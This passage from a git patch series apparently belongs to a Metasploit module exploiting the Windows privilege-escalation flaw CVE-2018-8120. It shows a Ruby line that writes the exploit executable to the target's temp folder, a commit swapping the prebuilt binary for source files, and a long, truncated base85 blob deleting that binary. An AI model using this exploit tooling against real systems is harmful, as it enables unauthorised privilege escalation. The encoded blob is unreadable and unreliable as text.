write_exe_to_target(raw, rexename) command = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}" vprint_status("Location of CVE-2018-8120.exe is: #{command}") From cdc2918c84dcd3725638d3d9fbfd0572e07c4593 Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Thu, 11 Oct 2018 11:42:51 -0500 Subject: [PATCH 31/39] removed original binary, added source --- data/exploits/CVE-2018-8120/CVE-2018-8120.exe | Bin 95744 -> 0 bytes .../exploits/CVE-2018-8120/CVE-2018-8120.sln | 28 + .../CVE-2018-8120/CVE-2018-8120.vcxproj | 154 ++++ .../CVE-2018-8120.vcxproj.filters | 27 + .../CVE-2018-8120/CVE-2018-8120/Source.cpp | 667 +++++++++++++++++ .../CVE-2018-8120/CVE-2018-8120/shellcode.asm | 70 ++ .../source/exploits/CVE-2018-8120/LICENSE | 674 ++++++++++++++++++ 7 files changed, 1620 insertions(+) delete mode 100644 data/exploits/CVE-2018-8120/CVE-2018-8120.exe create mode 100755 external/source/exploits/CVE-2018-8120/CVE-2018-8120.sln create mode 100755 external/source/exploits/CVE-2018-8120/CVE-2018-8120/CVE-2018-8120.vcxproj create mode 100755 external/source/exploits/CVE-2018-8120/CVE-2018-8120/CVE-2018-8120.vcxproj.filters create mode 100755 external/source/exploits/CVE-2018-8120/CVE-2018-8120/Source.cpp create mode 100755 external/source/exploits/CVE-2018-8120/CVE-2018-8120/shellcode.asm create mode 100755 external/source/exploits/CVE-2018-8120/LICENSE diff --git a/data/exploits/CVE-2018-8120/CVE-2018-8120.exe b/data/exploits/CVE-2018-8120/CVE-2018-8120.exe deleted file mode 100644 index 036dd38a1307ee9a5505822a095c2bee484a57f0..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 95744 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%0ArEwM5#f#?;j`@|qwFLeNn(I_Jw7EZT2k~x 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 